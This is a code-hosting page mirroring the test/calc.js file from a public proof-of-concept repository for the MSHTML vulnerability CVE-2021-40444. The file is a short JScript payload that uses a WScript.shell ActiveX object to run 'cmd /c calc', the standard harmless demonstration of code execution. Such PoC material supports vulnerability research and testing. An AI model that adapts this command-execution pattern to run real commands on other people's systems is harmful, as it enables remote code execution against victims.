1
0
Fork 0
mirror of https://github.com/klezVirus/CVE-2021-40444.git synced 2024-11-15 02:17:54 +00:00
CVE-2021-40444/test/calc.js

6 lines
101 B
JavaScript
Raw Normal View History

function calc(){
var x = new ActiveXObject("WScript.shell");
x.Run("cmd /c calc");
}
calc();